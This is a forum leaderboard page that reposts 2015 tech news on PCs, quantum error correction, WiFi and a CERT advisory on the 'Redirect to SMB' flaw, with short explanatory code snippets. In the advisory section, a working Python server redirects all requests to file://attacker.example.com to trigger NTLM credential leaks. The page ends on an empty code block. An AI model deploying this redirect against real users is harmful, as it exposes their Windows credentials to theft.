Leaderboard
Popular Content
Showing content with the highest reputation on 04/30/2015 in all areas
-
A Colorado man says he has no regrets after unloading eight rounds into his dysfunctional Dell desktop, though he faces a fine for doing so. “I just had it,” Lucas Hinch, 38, told The Smoking Gun (via Ars Technica). Apparently the PC had thrown up one too many blue screens of death in recent months, so Hinch took it into an alley, loaded up a 9mm Hi-Point pistol that he’d purchased on Craigslist, and let the bullets fly. “It was glorious,” Hinch told the Los Angeles Times. “Angels sung on high.” Hinch admitted that the murder was “premeditated, oh, definitely,” and that he’d made sure there was nothing behind the desktop, and nothing from which the rounds could ricochet. The deed went down behind Hinch’s home, where he and his girlfriend also run a homeopathic herb store.
Despite his precautions, Colorado Springs police issued Hinch a citation for discharging a firearm within city limits. (The local police blotter summarizes the incident as “Man Kills His Computer.”) Hinch faces a possible fine, but jail time is highly unlikely, according to the Times. While the cops confiscated the gun, they left the computer behind, letting it remain a tribute to frustrated PC users everywhere.
The impact on you: Hey, we’ve all felt the pain of dealing with an overly cranky desktop before. Kudos to this guy for letting us live vicariously through his act of retaliation—and absorbing the legal ramifications so we don’t have to.
2 points
-
Acer is trying to cover all the bases with its back-to-school Windows PC lineup, announced en masse at an event Thursday in New York. The new computers are all due out this summer, ranging from sub-$300 laptop-tablet hybrids to desktop replacements with dedicated graphics cards. They’re all shipping with Windows 8.1, and all are compatible with Windows 10 when it arrives (we think) later this summer. There’s nothing particularly remarkable here, but the starting prices are low, and some of the laptops have a neat-sounding feature that reduces blue light from the screen, so you can work longer without eye strain.
Why this matters: Even if you have zero interest in Acer’s hardware, it’s worth noting that the company isn’t waiting for Windows 10 to release its back-to-school range. Microsoft is reportedly aiming for a late July launch, but we’re guessing many PC makers aren’t willing to leave the lucrative student shopping season to chance.
Acer’s lineup in a nutshell
Here’s a rundown of what Acer plans to launch:
Acer Aspire R 11: This Lenovo Yoga-like convertible laptop has an 11.6-inch display with a 360-degree hinge. Other specs include an Intel Pentium processor, up to 8GB of RAM, and up to a 1TB hard drive. The display has special modes to reduce eye strain from blue light, and the battery lasts up to eight hours. It’s set for a July launch, with a $249 starting price.
Acer Switch 10: A tablet-laptop hybrid with a 10-inch 1920x1200 display, Intel Atom quad-core processor, 2GB of RAM, up to 64GB of storage, and a 2MP front camera. The tablet alone weighs 1.31 pounds and measures 0.35 inches thick. A keyboard dock brings the weight to 2.64 pounds and has an optional hard drive of up to 1TB. It’s coming in July, starting at $279.
Acer Switch 10 E: Another 10-inch 2-in-1 with a 1280x800-pixel display, Intel Atom quad-core processor, 2GB of RAM, up to 64GB of storage, and dual 2MP cameras. The tablet alone weighs 1.39 pounds and measures 0.43 inches thick. With the keyboard dock (which has an optional hard drive of up to 1TB), it weighs 2.82 pounds. Prices start at $399 with an August launch.
Acer Aspire V 15: This 15-inch laptop has an Intel Core processor, Nvidia GeForce 940M graphics, up to 16GB of RAM, and a choice of up to a 2TB hard drive or up to a 1TB solid state drive. It also has aluminum trim and a backlit keyboard. Acer says the starting price is $599, but it’s unclear what tech specs you’ll get at that price.
Acer Aspire E: Acer’s meat-and-potatoes laptops come in 14-inch, 15.6-inch, and 17.3-inch flavors, all with Intel processors and a choice of Nvidia GeForce 940M or AMD Radeon R8 and R6 graphics. Other specs include up to 16GB of RAM and up to either a 2TB hard drive or 1TB solid state drive. Prices start at $379 for the 14-inch model—presumably with far inferior specs to what’s listed here—with July shipping.
Acer Aspire ES: This looks to be a cheaper tier than Acer’s E Series, with five screen sizes ranging from 11.6 inches to 17.3 inches. They’ll have Intel Pentium or Celeron processors, up to 8GB of RAM, up to 1TB of storage, and an optional DVD drive. Prices will start at $229 for the 11-inch model this July.
2 points
-
A year ago, Acer was struggling, and Jason Chen, its newly appointed CEO, thought the company could stay afloat by cutting its reliance on PCs and expanding in wearables and mobile devices. In view of the success of its Chromebooks and the pending release of Microsoft’s Windows 10, however, Chen is now doubling down on PCs. Chen is interested in gamers in particular. The company wants to offer premium gaming products that could compete with desktop PCs from boutique companies like Origin PC and Falcon Northwest. In a flat PC market, gaming is a “bright spot,” and Acer is planning to release products that Chen says could appeal to the most avid gamer. “We don’t want to do amateur, part-time work,” Chen said in an interview. Acer wants to be the first PC maker to offer a complete lineup of gaming products including PCs, monitors and mobile devices, he said.
At a lavish event in New York, Acer laid out a lineup of new gaming products including Predator laptops, desktops and a tablet. It was labeled a “sneak peek.” Reporters were able to handle the devices, but were not able to boot them up. The stylish 8-inch tablet, which will ship in the third quarter, attracted the most attention. Acer declined to offer details on the device, which may end up getting a reception similar to that of Nvidia’s Shield tablet, which has a limited audience. Aside from Nintendo’s DS, portable devices like Sony’s PlayStation Vita or Nvidia’s Shield haven’t sold well. Acer also showed off the Acer XR341CKA, a curved gaming monitor that can display images at 3440 x 1440 pixels. It supports Nvidia’s G-Sync technology, which provides a smooth gaming experience by working in conjunction with GeForce graphics cards to display better images and reduce stutter and lag. The curved monitor will become available in the U.S. starting in September for $1,299.
A complete lineup
The gaming monitor, tablet, desktops and laptops give Acer a complete gaming product lineup that other PC makers can’t boast, Chen said. “This year, every two to three months, you will see new products come out for gaming,” Chen said. Acer will target Predator at the hard-core gamer crowd, and the existing V-Nitro brand at less serious gamers who may also use the PC for business. Meanwhile, Chen feels gamers are attracted by more than hardware, and that Acer needs to be involved in the gaming community. The company has formed a worldwide “Team Acer” group to take part in and sponsor gaming events as part of its strategy to build relationships with gamers.
Acer’s aggressive chase of the gaming market comes just as Microsoft releases Windows 10, which will provide a better gaming experience with DirectX 12 APIs. But Acer is going to have to do a lot more than release fully loaded PCs. Big PC makers like Dell and Hewlett-Packard already have strong gaming offerings with unique designs and the latest and greatest technologies. Dell has been the more aggressive of the bunch with its Alienware brand, which has a Steam-ready gaming console and a unique accessory in which powerful graphics processors can be attached to a gaming laptop. Acer has made some progress in the PC market over the last year, becoming the largest Chromebook seller. The company was the world’s fifth largest PC maker in 2014, but its PC shipments declined in the first quarter of this year by 7 percent year over year. The company did well in the U.S., but was hit hard in the EMEA (Europe, Middle East and Africa) market due to pricing pressure.
2 points
-
Quantum computers won’t ever outperform today’s classical computers unless they can correct for errors that disrupt the fragile quantum states of their qubits. A team at Google has taken the next huge step toward making quantum computing practical by demonstrating the first system capable of correcting such errors.
Google’s breakthrough originated with the hiring of a quantum computing research group from the University of California, Santa Barbara in the autumn of 2014. The UCSB researchers had previously built a system of superconducting quantum circuits that performed with enough accuracy to make error correction a possibility. That earlier achievement paved the way for the researchers—many now employed at Google—to build a system that can correct the errors that naturally arise during quantum computing operations. Their work is detailed in the 4 March 2015 issue of the journal Nature. “This is the first time natural errors arising from the qubit environment were corrected,” said Rami Barends, a quantum electronics engineer at Google. “It’s the first device that can correct its own errors.”
Quantum computers have the potential to perform many simultaneous calculations by relying upon quantum bits, or qubits, that can represent information as both 1 and 0 at the same time. That gives quantum computing a big edge over today’s classical computers that rely on bits that can only represent either 1 or 0. But a huge challenge in building practical quantum computers involves preserving the fragile quantum states of qubits long enough to run calculations.
The solution that Google and UCSB have demonstrated is a quantum error-correction code that uses simple classical processing to correct the errors that arise during quantum computing operations. Such codes can’t directly detect errors in qubits without disrupting the fragile quantum states. But they get around that problem by relying on entanglement, a physics phenomenon that enables a single qubit to share its information with many other qubits through a quantum connection. The codes exploit entanglement with an architecture that includes “measurement” qubits entangled with neighboring “data” qubits.
The Google and UCSB team has been developing a specific quantum error-correction code called “surface code.” They eventually hope to build a 2-D surface code architecture based on a checkerboard arrangement of qubits, so that “white squares” would represent the data qubits that perform operations and “black squares” would represent measurement qubits that can detect errors in neighboring qubits. For now, the researchers have been testing the surface code in a simplified “repetition code” architecture that involves a linear, 1-D array of qubits. Their unprecedented demonstration of error correction used a repetition code architecture that included nine qubits. They tested the repetition code through the equivalent of 90,000 test runs to gather the necessary statistics about its performance. “This validates years and years of theory to show that error correction can be a practical possibility,” said Julian Kelly, a quantum electronics engineer at Google.
Just as importantly, the team’s demonstration showed that error correction rates actually improved when they increased the number of qubits in the system. That’s exciting news for quantum computing, because it shows that larger systems of qubits won’t necessarily collapse under a growing pile of errors. It means that larger quantum computing systems could be practical.
For instance, the team compared the error rate of a single physical qubit with the error rate of multiple qubits working together to perform logic operations. When they used the repetition code array of five qubits, the logical error rate was 2.7 times less than the single physical qubit error rate. A larger array of nine qubits showed even more improvement, with a logical error rate 8.5 times less than the single physical qubit error rate. As Kelly explains: “One, we wanted to show a system where qubits are cooperating and outperforming any single qubit. That’s an important milestone. Even more exciting than that, when we go from five to nine qubits, it gets better. If you want to get a better error rate, you add more qubits.”
This first demonstration of error correction shows a clear path forward for scaling up the size of quantum computing systems. But on its own terms, it still falls well short of the error correction rate needed to make quantum computing practical, said Austin Fowler, a quantum electronics engineer at Google. The team would need to improve error correction rates by 5 to 10 times in order to make quantum computing truly practical. Still, the current quantum computing system managed to maintain coherence in the quantum states of its qubits despite all the uncorrected errors—a fact that left the researchers feeling optimistic about the future. Their work was supported with government funding from the Intelligence Advanced Research Projects Activity and Army Research Office grants.
The latest error correction demonstration would mainly work with universal logic-gate quantum computers: systems that would represent super-fast versions of today’s classical “gate-model” computers. But Google has also invested in the alternate “quantum annealing” approach of Canadian company D-Wave Systems. D-Wave’s quantum annealing machines have sacrificed some qubit coherence to scale up quickly in size to the 512-qubit D-Wave Two machine—a system that dwarfs most experimental quantum computing systems containing just several qubits. Google has turned to John Martinis, a professor of physics at the University of California, Santa Barbara, along with his former UCSB researchers now on Google’s payroll, to try building a more stabilized version of D-Wave’s quantum annealing machines.
2 points
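The repetition-code principle described above lends itself to a toy simulation. The sketch below is a purely classical analogue with illustrative parameters: redundant copies of one bit stand in for data qubits, neighbor parities stand in for what the measurement qubits report, and a majority vote recovers the logical bit. (A real quantum code must do this without ever reading the data qubits directly, which is what the entanglement machinery is for.)
```python
import random

# Toy classical analogue of the bit-flip repetition code. All numbers are
# illustrative. Real hardware cannot read data qubits without destroying
# their state, so it extracts only neighbor parities (via the interleaved
# measurement qubits); syndromes() mimics those parity checks.

def encode(bit, n=9):
    return [bit] * n                                   # n redundant copies

def add_noise(word, p=0.1):
    return [b ^ (random.random() < p) for b in word]   # physical error rate p

def syndromes(word):
    # Parity of each neighboring pair: what the measurement qubits report.
    return [word[i] ^ word[i + 1] for i in range(len(word) - 1)]

def decode(word):
    return int(sum(word) > len(word) / 2)              # majority vote

trials, failures = 90_000, 0                           # mirrors the 90,000 runs
for _ in range(trials):
    noisy = add_noise(encode(0))
    _ = syndromes(noisy)   # locates errors without exposing the logical bit
    failures += decode(noisy) != 0
print(f"logical error rate ~{failures / trials:.5f} vs physical rate 0.1")
```
As in the experiment, growing the array from five to nine copies pushes the logical error rate down, because a logical failure now requires a majority of simultaneous physical errors.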
-
In March 2012 Alex Teichman was a Ph.D. student in Stanford University’s computer science department, working on self-driving cars. His goal: to help a self-driving car understand the environment around it, in particular, to be aware of pedestrians, bicyclists, and other moving objects that might come into its path. His approach: instead of traditional image analysis, use depth information about objects gathered by laser rangefinders or sensors to define them, and then teach the computer to learn about the objects by “following” them as they move about the scene.
While the math he developed to implement this is complex, Teichman says the basic idea is simple. “Have you ever seen a child ride up a glass elevator that looks down on the street? At ground level, a car parked out front looks normal and uninteresting, but as she rides upwards, things gradually start looking very different. She’s probably seeing the world in a very different way and perhaps giggling about it. And her visual systems are learning: ‘Hey, that’s what a car looks like from above, I’ve never seen that before, cool!’”
In the self-driving car world, Teichman used this technology to make the car’s computers better able to recognize important things in the world around them with less manual training. “Imagine there is a bicyclist riding around on Stanford’s campus,” says Teichman. “He is in the normal pose of a bicyclist, leaning forward, and the software recognizes him as a bicyclist. But say that he takes his hands off the handlebars and leans back. A computer vision system might not recognize this because it’s never seen it before. However, [my] algorithm knows it is still a bicyclist, because it saw it previously and was tracking it over time, so it now knows it’s the same thing. It can now learn from that. With this kind of semi-supervised machine learning, I would sit down and label 10 examples of things that are bicyclists and not bicyclists, and then give the system unannotated data gathered by just driving around with the car. It reduced the amount of manual annotation by an order of magnitude or two.”
Teichman wasn’t thinking about other applications for this technology beyond autonomous vehicles—until a strange set of circumstances at home spooked him a bit. He lived in a small rental cottage in Palo Alto. One day, he found a notice on the door informing him that a contractor for a local utility needed to perform a pipe inspection. He scheduled the inspection and let in the person who arrived, but then the person simply walked around the cottage and left; he didn’t seem all that focused on the pipes. Within days of that visit, and after reading a local police report about an upswing in home burglaries, Teichman started getting a series of phone solicitations that seemed odd to him—and far more frequent than usual. There were security companies wanting to schedule appointments, debt collectors looking for people that didn’t live there, people calling in sick to companies he’d never heard of. Had a burglar cased his home, and was now trying to figure out his typical schedule? He decided to put together his own home security system, using the computer vision technology he’d been working on.
The system, running on two laptops and connected to commercial range-sensing cameras similar to the Microsoft Kinect, would know the difference between a tree branch blowing in front of a window (because the branch had already been there, and had simply started to move when the wind came up) and a person climbing up and looking in that window (because the person was new to the scene). He programmed the computer to send a short video clip off site if it detected an intruder; that way, if his computer got stolen, he’d still have the data. And then he left for a backpacking trip.
At this point, Teichman says, he was actually hoping he’d get burglarized, so he could see how well his system worked. He didn’t. The phone calls—and his fears—eventually went away, and Teichman didn’t think much more about that project until 2014, when he and fellow Stanford student Hendrik Dahlkamp (co-inventor of the technology that became Google Street View) started talking about Teichman’s system at a party. “We realized together that there was huge potential here for a real product.” The two started that summer to turn Teichman’s DIY project into that product. The idea was to build an inexpensive, easy-to-set-up home security device that understands the difference between your dog and an intruder, will alert you via an app to any suspected problems, and will call the police if you don’t respond. They incorporated as a company in October of last year, then went through the StartX program, a startup boot camp for Stanford students, alumni, and faculty.
2 points
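Teichman's tracking trick is easy to sketch in code: a track ties together every observation of one physical object, so a single confident classification can label all of them, including poses the classifier has never seen. Everything below (function names, the stand-in classifier, the data) is hypothetical, not his actual algorithm:
```python
# Hypothetical sketch of tracking-based semi-supervised learning: if any
# frame in a track is confidently classified, every frame in that track
# inherits the label and becomes new training data.

def propagate_labels(tracks, classify, threshold=0.9):
    new_training_data = []
    for observations in tracks.values():
        scored = [classify(obs) for obs in observations]
        best_label, best_conf = max(scored, key=lambda lc: lc[1])
        if best_conf >= threshold:
            # The leaned-back cyclist inherits "bicyclist" because earlier
            # frames of the same tracked object were recognized.
            new_training_data += [(obs, best_label) for obs in observations]
    return new_training_data   # feed back into training, then repeat

# Stand-in classifier: confident only about the familiar pose.
def toy_classifier(obs):
    return ("bicyclist", 0.95) if obs == "upright pose" else ("unknown", 0.3)

tracks = {"track_7": ["upright pose", "leaning back, no hands"]}
print(propagate_labels(tracks, toy_classifier))
# -> both observations come back labeled "bicyclist"
```
This is how a handful of hand-labeled examples plus hours of unannotated driving data can replace orders of magnitude more manual annotation.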
-
After testing dozens of applications, Cylance identified 31 vulnerable software packages that can be abused to leak login credentials using this vulnerability. They included popular applications such as Adobe Reader, Apple QuickTime and Windows Media Player, as well as several antivirus, security, team and developer tools. They disclosed this to CERT at Carnegie Mellon University in late February. The CERT unit of the Software Engineering Institute at Carnegie Mellon University, which tracks computer bugs and internet security issues, issued information about this on Monday. According to a Cylance blog posting by Brian Wallace on Monday, "Carnegie Mellon University CERT disclosed the vulnerability to the public today (#VU672268), following six weeks of working with vendors to help them mitigate the issue."
The CERT information, headlined "Vulnerability Note VU#672268, Microsoft Windows NTLM automatically authenticates via SMB when following a file:// URL," spelled out the problem: "Software running on Microsoft Windows that utilizes HTTP requests can be forwarded to a file:// protocol on a malicious server, which causes Windows to automatically attempt authentication via SMB to the malicious server in some circumstances. The encrypted form of the user's credentials are then logged on the malicious server. This vulnerability is alternatively known as 'Redirect to SMB'."
The Cylance team uncovered Redirect to SMB while hunting for ways to abuse a chat client feature providing image previews. Wallace said that "Redirect to SMB" is most likely to be used in targeted attacks by advanced actors—attackers must have control over some component of a victim's network traffic. Bill Rigby of Reuters further explained that if a hacker can get a Windows user to click on a bad link in an email or on a website, "it can essentially hijack communications and steal sensitive information once the user's computer has logged on to the controlled server." Rigby said, though, that in the latest variation of the technique, Cylance said users could be "hacked without even clicking on a link." That could happen if attackers intercepted "automated requests to log on to a remote server issued by applications running in the background of a typical Windows machine, for example, to check for software updates."
But wait. Microsoft said the threat posed by the purported weakness was not as great as Cylance supposed. Reuters quoted an emailed statement from Microsoft: "Several factors would need to converge for a 'man-in-the-middle' cyberattack to occur. Our guidance was updated in a Security Research and Defense blog in 2009, to help address potential threats of this nature. There are also features in Windows, such as Extended Protection for Authentication, which enhances existing defenses for handling network connection credentials." Chris Paoli in GCN, a site for public-sector IT professionals, pointed out that "While the Cylance team has been able to provide proof of concept for the flaw, it said that there have been no known attacks using Redirect to SMB."
What does CERT think of all this? Under the "Solution" heading, the announcement said "The CERT/CC is currently unaware of a full solution to this problem."
They said that affected users may consider a number of workarounds: consider blocking outbound SMB connections (TCP ports 139 and 445) from the local network to the WAN; update NTLM group policy; do not use NTLM for authentication by default in applications; and use a strong password and change passwords frequently. The CERT note thanked Brian Wallace of Cylance for reporting the vulnerability.
2 points
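The attack's moving parts are simple enough to sketch. An attacker who controls some HTTP response answers it with a redirect to a file:// URL; a vulnerable Windows API follows the redirect, opens an SMB connection, and automatically attempts NTLM authentication. Below is a minimal sketch of the redirect half only, using Python's standard library; attacker.example.com is a placeholder, and the credential-logging SMB listener is deliberately not shown:
```python
# Sketch of the redirect half of "Redirect to SMB": every HTTP request is
# answered with a 302 pointing at a file:// URL. A vulnerable Windows API
# following this redirect would begin an SMB/NTLM handshake with the named
# host. Illustrative only; attacker.example.com is a placeholder.
from http.server import BaseHTTPRequestHandler, HTTPServer

class RedirectToSMB(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(302)
        self.send_header("Location", "file://attacker.example.com/img/a.jpg")
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 8080), RedirectToSMB).serve_forever()
```
Blocking outbound TCP 139/445 at the network edge, as CERT suggests first, breaks the final SMB hop of exactly this sequence.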
-
An image of a polar bear on a shrinking or growing iceberg helps users of the "My Earth" energy use tracking app visualize the impacts of their daily activities. Credit: Dylan Moriarty
For a generation motivated by technology and fast-moving information, a professor at the University of Wisconsin-Madison has created an energy-tracking app to make reducing day-to-day energy usage more accessible. Nancy Wong, a professor of consumer science in the UW-Madison School of Human Ecology, designed the new app with a diary format in which users can choose daily activities to reduce their carbon emissions and energy consumption. Called "My Earth—Track Your Carbon Savings," the app will launch on April 20 during the Nelson Institute Earth Day Conference.
UW-Madison computer sciences Professor Suman Banerjee initially approached Wong for a consumer perspective on a project student John Meurer was developing. Working together, they quickly realized many opportunities to make the proposed app more user-friendly and customizable. Drawing on parallels between food consumption and energy use, Wong's team designed "My Earth" with approaches used in food-tracking apps that help users catalog their daily eating habits. "We tried to categorize it into the different kinds of activities that you can do so that people can select from whatever suits their lifestyle," Wong says.
The app is organized into five main categories: electricity, recycling, travel, food and usage. Each category includes day-to-day activities, ranging from ones as simple as recycling a milk jug to more complicated actions, such as upgrading to a high-efficiency toilet that reduces the need for energy-intensive wastewater treatment. As users check off activities in their individual diaries, they accumulate saved carbon units. Wong wanted the app to track daily progress visually, to help users see how smaller steps can build toward a larger goal and that individual actions can have broader impact. Research assistant Andrew Stevens came up with the idea of using a polar bear clinging to a small iceberg to represent the impacts of the chosen activities. The more carbon units and energy saved, the larger the iceberg becomes, Wong says. "The iceberg is going to grow and then eventually the bear can sit on it," she says. "I want it to grow organically, so that it gets bigger, so you can have another bear, so then you can have a bear family."
Wong says she hopes people will use "My Earth" to identify and prioritize energy-saving activities. She was motivated to work on the app by a belief that behaviors need to be simple and understandable in order to become sustainable. "There is a real disconnect between what people say that they want to do in terms of their attitudes toward the environment and conservation and translating that into actual behavior," Wong says. "Carbon units are too abstract for people to understand. Translating conservation behaviors into something tangible, such as a growing iceberg, could help."
The free app is available for both iOS and Android platforms. Attendees at the Nelson Institute Earth Day Conference on April 20 can also visit Wong's booth to learn more. "Most of the time, I see (lack of concern for the environment) as a failure to connect individual action to that bigger picture," Wong says. "Hopefully the app could help you understand actually whatever you do is not insignificant and this is how you can contribute."
2 points
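The diary mechanic the article describes reduces to a small data structure: categorized activities, each worth some carbon saving, accumulated into a running total that drives the iceberg graphic. The per-activity values below are invented for illustration; the app's real carbon-unit figures aren't given in the article:
```python
# Toy sketch of the "My Earth" diary mechanic, with invented carbon values.
ACTIVITIES = {                        # category -> {activity: carbon units}
    "recycling": {"recycle a milk jug": 0.03},
    "travel":    {"bike instead of drive": 1.2},
    "usage":     {"install high-efficiency toilet": 0.5},
}

diary = [("recycling", "recycle a milk jug"),   # activities checked off today
         ("travel", "bike instead of drive")]

total = sum(ACTIVITIES[cat][act] for cat, act in diary)
iceberg = "#" * int(total * 10)       # the visual grows with accumulated savings
print(f"saved {total:.2f} carbon units  iceberg: {iceberg}")
```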
-
Hello, my name is Artiom and I'm 19 years old. A few weeks ago I got started on YouTube, specifically gaming, and I have a channel that's growing day by day. I've made it a hobby, not a way of making money. Channel: https://www.youtube....ch4sChymPi4sYXA If you subscribe, you'll be helping me a lot. I play several genres of games, which you can see here: https://www.youtube....4sYXA/playlists Don't forget to subscribe, thank you in advance. You can also leave your opinion of the channel.
1 point
-
As d3v said, try Minecraft to start with. If you have a weak video card, you'll need a mod called "Opti-Fine". I have a fairly low-end laptop too, but with that mod it runs. It doesn't matter, I've always liked longer episodes. To get far on YouTube you have to be patient and original. With Minecraft, I've heard people have gotten bored of it. Everybody makes money off it. I'll be following your progress too. Good luck!
1 point
-
Today we have the honor of celebrating the birthday of our dear moderator Călin™, who turns the wonderful age of 18 today. He has been with us for a very long time, more than two years, and has also been part of the community Staff for a long while, always eager to help members in need and always coming up with innovative and original ideas. I can also say that he has been, and still is, a very good friend of mine, and it's always a pleasure to talk, even if he's rather shy and doesn't want to show off his "little voice". I'd like to conclude by wishing him a big HAPPY BIRTHDAY: may you get everything you wish for, succeed in anything and everything, pass your driving test on the first try (so you can drive us around too), and score a 10 on both subjects in the BAC mock exam, and likewise in the real exam next year. https://www.youtube.com/watch?v=bJ7B9x027uc Sorry for the long post, here is an anniversary potato
1 point
-
Happy birthday, Călin, and good health; may everything you wish for come true.
1 point
-
Energy efficiency is (if you’ll pardon the pun) a hot topic. Foundries and semiconductor manufacturers now trumpet their power-saving initiatives with the same fervor they once reserved for clock speed and performance improvements. AMD is no exception to this trend, and the company has just published a new white paper that details the work it’s doing as part of its “25x20” project, which intends to increase performance per watt by 25x within five years. If you’ve followed our discussions on microprocessor trends and general power innovation, much of what the paper lays out will be familiar. The paper steps through hUMA (Heterogeneous Unified Memory Access) and the overall advantages of HSA, as well as the slowing rate of power improvements delivered strictly by foundry process shrinks. The most interesting area for our purposes is the additional information AMD is offering around Adaptive Voltage and Frequency Scaling, or AVFS. Most of these improvements are specific to Carrizo — the Carrizo-L platform doesn’t implement them.
AVFS vs DVFS
There are two primary methods of conserving power in a microprocessor: the aforementioned AVFS, and Dynamic Voltage and Frequency Scaling, or DVFS. Both AMD and Intel have made use of DVFS for over a decade. DVFS uses what’s called open-loop scaling. In this type of system, the CPU vendor determines the optimal voltage for the chip based on the target application and frequency. DVFS is not calibrated to any specific chip — instead, Intel, AMD, and other vendors create a statistical model that predicts what voltage level a chip that’s already verified as good will need to operate at a given frequency. DVFS is always designed to incorporate a significant amount of overhead. A CPU’s operating temperature will affect its voltage requirements, and since AMD and Intel don’t know whether any given SoC will be operating at 40C or 80C, they tweak the DVFS model to ensure a chip won’t destabilize. In practice, this means margins of 10-20% at any given point.
1 point
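A toy model makes the open-loop/closed-loop distinction concrete: DVFS picks a voltage from a fleet-wide statistical model plus a fixed guardband, while AVFS reads on-die sensors and supplies only what this particular chip needs at its actual temperature. The V/f curve and coefficients below are invented for illustration, not AMD's data:
```python
# Toy contrast of open-loop DVFS vs closed-loop AVFS. All numbers invented.

def fleet_model(freq_ghz):
    return 0.6 + 0.25 * freq_ghz    # statistical V/f curve for the product line

def dvfs_voltage(freq_ghz, guardband=0.15):
    # Open loop: pad the fleet model so even a slow, hot chip stays stable.
    return fleet_model(freq_ghz) * (1 + guardband)

def avfs_voltage(freq_ghz, chip_offset, temp_c):
    # Closed loop: on-die monitors report what this chip needs right now.
    return fleet_model(freq_ghz) + chip_offset + 0.0005 * (temp_c - 25)

for f in (1.0, 2.0, 3.0):
    d, a = dvfs_voltage(f), avfs_voltage(f, chip_offset=0.01, temp_c=40)
    print(f"{f:.1f} GHz: DVFS {d:.3f} V, AVFS {a:.3f} V, "
          f"margin recovered {100 * (1 - a / d):.1f}%")
```
Since dynamic power scales roughly with the square of voltage, recovering even 10% of guardband is worth nearly 20% of power at the same frequency, which is the whole appeal of AVFS.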
-
If you’re looking for faster WiFi performance, you want 802.11ac — it’s as simple as that. In essence, 802.11ac is a supercharged version of 802.11n (the current WiFi standard that your smartphone and laptop probably use), offering link speeds ranging from 433 megabits per second (Mbps) all the way through to several gigabits per second. To achieve speeds that are dozens of times faster than 802.11n, 802.11ac works exclusively in the 5GHz band, uses a ton of bandwidth (80 or 160MHz), operates in up to eight spatial streams (MIMO), and employs a kind of technology called beamforming. For more details on what 802.11ac is, and how it will eventually replace wired gigabit Ethernet networking at home and in the office, read on.
How 802.11ac works
Years ago, 802.11n introduced some exciting technologies that brought massive speed boosts over 802.11b and g. 802.11ac does something similar compared with 802.11n. For example, whereas 802.11n had support for four spatial streams (4×4 MIMO) and a channel width of 40MHz, 802.11ac can utilize eight spatial streams and has channels up to 80MHz wide — which can then be combined to make 160MHz channels. Even if everything else remained the same (and it doesn’t), this means 802.11ac has 8x160MHz of spectral bandwidth to play with, vs. 4x40MHz — a huge difference that allows it to squeeze vast amounts of data across the airwaves.
To boost throughput further, 802.11ac also introduces 256-QAM modulation (up from 64-QAM in 802.11n), which basically squeezes 256 different signals over the same frequency by shifting and twisting each into a slightly different phase. In theory, that quadruples the spectral efficiency of 802.11ac over 802.11n. Spectral efficiency is a measure of how well a given wireless protocol or multiplexing technique uses the bandwidth available to it. In the 5GHz band, where channels are fairly wide (20MHz+), spectral efficiency isn’t so important. In cellular bands, though, channels are often only 5MHz wide, which makes spectral efficiency very important.
802.11ac also introduces standardized beamforming (802.11n had it, but it wasn’t standardized, which made interoperability an issue). Beamforming is essentially transmitting radio signals in such a way that they’re directed at a specific device. This can increase overall throughput and make it more consistent, as well as reduce power consumption. Beamforming can be done with smart antennae that physically move to track the device, or by modulating the amplitude and phase of the signals so that they destructively interfere with each other, leaving just a narrow, not-interfered-with beam. 802.11ac uses this second method, which can be implemented by both routers and mobile devices. Finally, 802.11ac, like 802.11 versions before it, is fully backwards compatible with 802.11n and 802.11g — so you can buy an 802.11ac router today, and it should work just fine with your older WiFi devices.
The range of 802.11ac
In theory, on the 5GHz band and using beamforming, 802.11ac should have the same or better range than 802.11n (without beamforming). The 5GHz band, thanks to less penetration power, doesn’t have quite the same range as 2.4GHz (802.11b/g). But that’s the trade-off we have to make: there simply isn’t enough spectral bandwidth in the massively overused 2.4GHz band to allow for 802.11ac’s gigabit-level speeds. As long as your router is well-positioned, or you have multiple routers, it shouldn’t matter a huge amount.
As always, the more important factor will likely be the transmission power of your devices and the quality of their antennae.
How fast is 802.11ac?
And finally, the question everyone wants answered: just how fast is 802.11ac WiFi? As always, there are two answers: the theoretical max speed that can be achieved in the lab, and the practical maximum speed that you’ll most likely receive at home in the real world, surrounded by lots of signal-attenuating obstacles.
The theoretical max speed of 802.11ac is eight 160MHz 256-QAM channels, each of which is capable of 866.7Mbps — a grand total of 6,933Mbps, or just shy of 7Gbps. That’s a transfer rate of 900 megabytes per second — more than you can squeeze down a SATA 3 link. In the real world, thanks to channel contention, you probably won’t get more than two or three 160MHz channels, so the max speed comes down to somewhere between 1.7Gbps and 2.5Gbps. Compare this with 802.11n’s max theoretical speed, which is 600Mbps.
Top-performing routers today (April 2015) include the D-Link AC3200 Ultra Wi-Fi Router (DIR-890L/R), the Linksys Smart Wi-Fi Router AC 1900 (WRT1900AC), and the Trendnet AC1750 Dual-Band Wireless Router (TEW-812DRU), as our sister site PCMag reports. With these routers, you can certainly expect some impressive speeds from 802.11ac, but it still won’t replace your wired Gigabit Ethernet network just yet. In Anandtech’s 2013 testing, a WD MyNet AC1300 802.11ac router (up to three streams) was paired with a range of 802.11ac devices that supported either one or two streams. The fastest data rate was achieved by a laptop with an Intel 7260 802.11ac wireless adapter, which used two streams to reach 364 megabits per second — over a distance of just five feet (1.5m). At 20 feet (6m) and through a wall, the same laptop was the fastest — but this time maxing out at 140Mbps. The listed max speed for the Intel 7260 is 867Mbps (2x433Mbps streams).
In situations where you don’t need the maximum performance and reliability of wired GigE, though, 802.11ac is very compelling indeed. Instead of cluttering up your living room by running an Ethernet cable to the home theater PC under your TV, 802.11ac now has enough bandwidth to wirelessly stream the highest-definition content to your HTPC. For all but the most demanding use cases, 802.11ac is a very viable alternative to Ethernet.
The future of 802.11ac
802.11ac will only get faster, too. As we mentioned earlier, the theoretical max speed of 802.11ac is just shy of 7Gbps — and while you’ll never hit that in a real-world scenario, we wouldn’t be surprised to see link speeds of 2Gbps or more in the next few years. At 2Gbps, you’ll get a transfer rate of 256MB/sec, and if that happens, Ethernet will serve less and less purpose. To reach such speeds, though, chipset and device makers will have to suss out how to implement four or more 802.11ac streams, in terms of both software and hardware. We imagine Broadcom, Qualcomm, MediaTek, Marvell, and Intel are already well on their way to implementing four- and eight-stream 802.11ac solutions for integration in the latest routers, access points, and mobile devices — but until the 802.11ac spec is finalized, second-wave chipsets and devices are unlikely to emerge. A lot of work will have to be done by the chipset and device makers to ensure that advanced features, such as beamforming, comply with the standard and are interoperable with other 802.11ac devices.
1 point
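The headline figures quoted above follow directly from the standard's arithmetic: data subcarriers per channel width, bits per symbol from the QAM order, the 5/6 coding rate, and the 3.6µs short-guard-interval symbol time. A quick sanity check in Python:
```python
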